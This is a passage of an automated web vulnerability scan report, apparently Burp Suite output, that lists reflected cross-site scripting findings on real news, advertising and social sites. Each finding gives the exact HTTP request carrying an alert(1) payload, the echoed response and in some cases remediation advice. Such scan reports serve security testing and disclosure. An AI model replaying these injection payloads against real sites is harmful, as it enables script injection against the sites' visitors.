Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL02WSITEMABC1proddmlocal
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1409
Vary: Accept-Encoding
Expires: Wed, 07 Sep 2011 14:14:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:15 GMT
Connection: close
Set-Cookie: SiteLifeHost=SJL02WSITEMABC1proddmlocal; domain=abc.net.au; path=/

PluckSDK.jsonpcb('request_0')({
"Envelopes": [
{
"PayloadType": "Responses.System.InvalidRequestExceptionResponse",
"Payload": {
"IsCachedResponse": false,
"Obj
...[SNIP]...
ests.Users.UserRequest\",\"UserKey\":{\"Key\":\"\",\"ObjectType\":\"Models.Users.UserKey\"}},\"PayloadType\":\"Requests.Users.UserRequest\"}],\"Metadata\":null,\"ObjectType\":\"Requests.RequestBatch\"}82bb7<img src=a onerror=alert(1)>faa916c3a66",
"ExceptionCode": "InvalidOrMalformedRequest",
"ExceptionLevel": "Error",
"ExceptionMessage": "Exception while deserializing request: JsonReaderException:
...[SNIP]...

2.58. http://tools.ntnews.com.au/poll/poll.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tools.ntnews.com.au
Path:	/poll/poll.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6941f"style%3d"x%3aexpression(alert(1))"5dc6096cd9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6941f"style="x:expression(alert(1))"5dc6096cd9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /poll/poll.php/6941f"style%3d"x%3aexpression(alert(1))"5dc6096cd9d HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:19:06 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n47 ( lax-agg-n30), ms lax-agg-n30 ( origin>CONN)
Cache-Control: no-cache
Content-Length: 1168
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<form name="online-poll-form" method="post" action="/poll/poll.php/6941f"style="x:expression(alert(1))"5dc6096cd9d?">
...[SNIP]...

2.59. http://tools.themercury.com.au/feeds/feed-ticker.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://tools.themercury.com.au
Path:	/feeds/feed-ticker.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f7e9\'%3beb302189a6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8f7e9\\';eb302189a6e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /feeds/feed-ticker.php?category_id=1&range=0to6&rss_name=-breaking-/8f7e9\'%3beb302189a6enews HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:22 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n26), ms lax-agg-n26 ( origin>CONN)
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:23:24 GMT
Age: 0
Content-Length: 1137
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write('<ul id="TickerVertical"><li><a href="http://tools.themercury.com.au/stories/48249541-breaking-/8f7e9\\';eb302189a6enews.php"><span class="time">12:01 am</span>Lighter winds help Texas
...[SNIP]...

2.60. http://tools.themercury.com.au/feeds/feed-ticker.php [rss_name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tools.themercury.com.au
Path:	/feeds/feed-ticker.php

Issue detail

The value of the rss_name request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3eb9a\'%3balert(1)//bc3ffbac64e was submitted in the rss_name parameter. This input was echoed as 3eb9a\\';alert(1)//bc3ffbac64e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /feeds/feed-ticker.php?category_id=1&range=0to6&rss_name=-breaking-news3eb9a\'%3balert(1)//bc3ffbac64e HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:02 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n41), ms lax-agg-n41 ( origin)
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:23:03 GMT
Age: 0
Content-Length: 1191
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write('<ul id="TickerVertical"><li><a href="http://tools.themercury.com.au/stories/48249541-breaking-news3eb9a\\';alert(1)//bc3ffbac64e.php"><span class="time">12:01 am</span>Lighter winds he
...[SNIP]...

2.61. http://tools.themercury.com.au/feeds/feed-with-lead.php [rss_name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tools.themercury.com.au
Path:	/feeds/feed-with-lead.php

Issue detail

The value of the rss_name request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d0c1\'%3balert(1)//461c9fa19a4 was submitted in the rss_name parameter. This input was echoed as 4d0c1\\';alert(1)//461c9fa19a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /feeds/feed-with-lead.php?category_id=3&range=0to6&rss_name=-world-news4d0c1\'%3balert(1)//461c9fa19a4&1801 HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:03 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n47), ms lax-agg-n47 ( origin)
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:23:04 GMT
Age: 0
Content-Length: 1692
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write('<div class="article-extracts-box"><div class="me2-extract-box"><div class="ark-img-class"><a href="http://tools.themercury.com.au/stories/48248721-world-news4d0c1\\';alert(1)//461c9fa19a4.php" >
...[SNIP]...

2.62. http://tools.themercury.com.au/yoursay/yoursay-single-extract.php [range parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tools.themercury.com.au
Path:	/yoursay/yoursay-single-extract.php

Issue detail

The value of the range request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6edf0'%3balert(1)//32abf63a0ea was submitted in the range parameter. This input was echoed as 6edf0';alert(1)//32abf63a0ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /yoursay/yoursay-single-extract.php?range=0to16edf0'%3balert(1)//32abf63a0ea HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:17:51 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n26), ms lax-agg-n26 ( origin>CONN)
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:22:53 GMT
Age: 0
Content-Length: 195
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

get_Comment_Summary:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '16edf0';alert(1)//32abf63a0ea' at line 3

2.63. http://tps30.doubleverify.com/visit.js [plc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tps30.doubleverify.com
Path:	/visit.js

Issue detail

The value of the plc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10382'%3balert(1)//53fe50912c2 was submitted in the plc parameter. This input was echoed as 10382';alert(1)//53fe50912c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /visit.js?ctx=1074175&cmp=5795406&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=6973337710382'%3balert(1)//53fe50912c2&advid=2977403&sid=1089807&adid=&btreg=245334907&btsvrreg=doubleclick&&num=395&srcurl=http%3A%2F%2Fwww.watoday.com.au%2F&curl=&qpgid=&referrer=http%3A%2F%2Fad.doubleclick.net%2Fadi%2FN6560.159469.AOD-INVITE%2FB5795406.3%3Bsz%3D300x250%3Bclick%3Dhttp%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlOpTZqQ8JsCZUJsTIi_406.k2y_JELrFM4m80TCEC.V1WAFQk1bNw1Oed8i1SM8ee.RmPfWfTvNitOYjvKinJdh4yeQiqxZHFiB93NdQAMWVNW.H_rWG4A-%26redirectURL%3D%3Bord%3Da5ae6592-0cb9-4d98-8ee9-22cae8bf6618%3F HTTP/1.1
Host: tps30.doubleverify.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=2733665-13225b1b58a-2854b473-10; __utma=209764608.1020985525.1314892399.1314892399.1314892399.1; __utmz=209764608.1314892399.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:267-HSA-807&token:_mch-doubleverify.com-1314892398926-27601

Response

HTTP/1.1 200 OK
Connection: close
Content-Type: text/javascript; charset=utf-8
Expires: 9/6/2011 2:14:25 PM
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 14:14:24 GMT
Content-Length: 586

function obaCallback() { new OBACan({ "agncid": '1074175', "cmpid": '5795406', "plcid": '6973337710382';alert(1)//53fe50912c2', "sid": '1089807' }, { "advName": 'Yahoo', "advLink": 'http://www.doubleverify.com/PreferenceManager', "advPolicy": 'http://info.yahoo.com/privacy/us/yahoo/details.html', "advLogoURL": '', "networkNa
...[SNIP]...

2.64. http://tps30.doubleverify.com/visit.js [sid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tps30.doubleverify.com
Path:	/visit.js

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f581'%3balert(1)//47784fca2f9 was submitted in the sid parameter. This input was echoed as 2f581';alert(1)//47784fca2f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /visit.js?ctx=1074175&cmp=5795406&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=69733377&advid=2977403&sid=10898072f581'%3balert(1)//47784fca2f9&adid=&btreg=245334907&btsvrreg=doubleclick&&num=395&srcurl=http%3A%2F%2Fwww.watoday.com.au%2F&curl=&qpgid=&referrer=http%3A%2F%2Fad.doubleclick.net%2Fadi%2FN6560.159469.AOD-INVITE%2FB5795406.3%3Bsz%3D300x250%3Bclick%3Dhttp%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlOpTZqQ8JsCZUJsTIi_406.k2y_JELrFM4m80TCEC.V1WAFQk1bNw1Oed8i1SM8ee.RmPfWfTvNitOYjvKinJdh4yeQiqxZHFiB93NdQAMWVNW.H_rWG4A-%26redirectURL%3D%3Bord%3Da5ae6592-0cb9-4d98-8ee9-22cae8bf6618%3F HTTP/1.1
Host: tps30.doubleverify.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=2733665-13225b1b58a-2854b473-10; __utma=209764608.1020985525.1314892399.1314892399.1314892399.1; __utmz=209764608.1314892399.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:267-HSA-807&token:_mch-doubleverify.com-1314892398926-27601

Response

HTTP/1.1 200 OK
Connection: close
Content-Type: text/javascript; charset=utf-8
Expires: 9/6/2011 2:14:25 PM
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 14:14:24 GMT
Content-Length: 652

function obaCallback() { new OBACan({ "agncid": '1074175', "cmpid": '5795406', "plcid": '69733377', "sid": '10898072f581';alert(1)//47784fca2f9' }, { "advName": 'Yahoo', "advLink": 'http://www.doubleverify.com/PreferenceManager', "advPolicy": 'http://info.yahoo.com/privacy/us/yahoo/details.html', "advLogoURL": '', "networkName": 'AOD - Invite
...[SNIP]...

2.65. http://web.adblade.com/imps.php [description_color parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://web.adblade.com
Path:	/imps.php

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2
Content-Length: 1659
Content-Type: text/xml
Cache-Control: max-age=300
Expires: Wed, 07 Sep 2011 14:20:15 GMT
Date: Wed, 07 Sep 2011 14:15:15 GMT
Connection: close

<?xml version="1.0" encoding="iso-8859-1" ?>
<data>
<metadata>
<sector>weather</sector>
<title>Weatherzone</title>
<provider>Weatherzone</provider>
<provider_url>http://www.wea
...[SNIP]...
<forecasts type="1E045D<A>FE882287F62">
...[SNIP]...

2.70. http://www.7perth.com.au/javascript.js [a parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.7perth.com.au
Path:	/javascript.js

Issue detail

The value of the a request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f0dfc%3balert(1)//7471910ea1e was submitted in the a parameter. This input was echoed as f0dfc;alert(1)//7471910ea1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript.js?file=crossfade&a=cf1f0dfc%3balert(1)//7471910ea1e&b=crossfader&c=aW50ZXJ2YWw6MTYuMCxkdXJhdGlvbjoyLGF1dG9TdGFydDp0cnVlLHNldFNpemU6dHJ1ZQ== HTTP/1.1
Host: www.7perth.com.au
Proxy-Connection: keep-alive
Referer: http://www.7perth.com.au/view/seven-news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ifm3c4tfcqeoamntp6t3t0q3u2

Response

HTTP/1.1 200 OK
Cache-Control: public, maxage=31536000
Content-Type: text/javascript
Date: Wed, 07 Sep 2011 14:15:03 GMT
Expires: Thu, 06 Sep 2012 14:15:03 GMT
Pragma: public
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Content-Length: 123
Connection: keep-alive

var cf1f0dfc;alert(1)//7471910ea1e = new Crossfade('crossfader', { interval:16.0,duration:2,autoStart:true,setSize:true });

2.71. http://www.7perth.com.au/view/2/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.7perth.com.au
Path:	/view/2/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f4033<a>d6e90fbbbbf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /view/2/?f4033<a>d6e90fbbbbf=1 HTTP/1.1
Host: www.7perth.com.au
Proxy-Connection: keep-alive
Referer: http://www.7perth.com.au/view/seven-news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ifm3c4tfcqeoamntp6t3t0q3u2; __utma=147121073.539278268.1315422878.1315422878.1315422878.1; __utmb=147121073.2.10.1315422878; __utmc=147121073; __utmz=147121073.1315422878.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Sep 2011 14:24:38 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 13878

Warning: simplexml_load_string(): Entity: line 3: parser error : error parsing attribute name in /var/www/vhosts/system.millstream.com.au/httpdocs/system/view.php on line 609

Warning: simplexml_load
...[SNIP]...
<f4033<a>d6e90fbbbbf>
...[SNIP]...

2.72. http://www.7perth.com.au/view/about/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.7perth.com.au
Path:	/view/about/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 32723<a>d6ae782955f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /view/about/?32723<a>d6ae782955f=1 HTTP/1.1
Host: www.7perth.com.au
Proxy-Connection: keep-alive
Referer: http://www.7perth.com.au/view/seven-news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ifm3c4tfcqeoamntp6t3t0q3u2; __utma=147121073.539278268.1315422878.1315422878.1315422878.1; __utmb=147121073.2.10.1315422878; __utmc=147121073; __utmz=147121073.1315422878.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Sep 2011 14:24:39 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 10558

Warning: simplexml_load_string(): Entity: line 3: parser error : StartTag: invalid element name in /var/www/vhosts/system.millstream.com.au/httpdocs/system/view.php on line 609

Warning: simplexml_lo
...[SNIP]...
<32723<a>d6ae782955f>
...[SNIP]...

2.73. http://www.7perth.com.au/view/seven-news/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.7perth.com.au
Path:	/view/seven-news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b0854<a>a3548ec987a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /view/seven-news/?b0854<a>a3548ec987a=1 HTTP/1.1
Host: www.7perth.com.au
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=perth+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Sep 2011 14:14:46 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 13878

Warning: simplexml_load_string(): Entity: line 3: parser error : error parsing attribute name in /var/www/vhosts/system.millstream.com.au/httpdocs/system/view.php on line 609

Warning: simplexml_load
...[SNIP]...
<b0854<a>a3548ec987a>
...[SNIP]...

2.74. http://www.abc.net.au/perth/news/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/perth/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b8ad'-alert(1)-'9ea4dc44988 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /perth/news/?2b8ad'-alert(1)-'9ea4dc44988=1 HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=perth+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=420
Expires: Wed, 07 Sep 2011 14:21:19 GMT
Date: Wed, 07 Sep 2011 14:14:19 GMT
Content-Length: 48900
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<a href="http://www2b.abc.net.au/communities/asp/register.asp?from=/perth/news/?2b8ad'-alert(1)-'9ea4dc44988=1" class="gen_color1">
...[SNIP]...

2.75. http://www.linkedin.com/countserv/count/share [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.linkedin.com
Path:	/countserv/count/share

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload a7c92<img%20src%3da%20onerror%3dalert(1)>4d3bd15827 was submitted in the url parameter. This input was echoed as a7c92<img src=a onerror=alert(1)>4d3bd15827 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /countserv/count/share?url=http%3A%2F%2Fwww.perthnow.com.au%2Fbusiness%2Fbusiness-old%2Ffraud-blackmail-in-latest-oswal-claims%2Fstory-e6frg2qu-1226131700884a7c92<img%20src%3da%20onerror%3dalert(1)>4d3bd15827 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://resources.news.com.au/cs/library/modules/jquery-socialise/plugins/linkedin/iframe.html?url=http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&e6907e29-3b50-4659-95ed-c5124b8e731f"; visit=G

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:31:26 GMT
Content-Length: 213

IN.Tags.Share.handleCount({"count":0,"url":"http:\/\/www.perthnow.com.au\/business\/business-old\/fraud-blackmail-in-latest-oswal-claims\/story-e6frg2qu-1226131700884a7c92<img src=a onerror=alert(1)>4d3bd15827"});

2.76. http://adnxs.revsci.net/imp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://adnxs.revsci.net
Path:	/imp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bf24'-alert(1)-'b7c07369c41 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

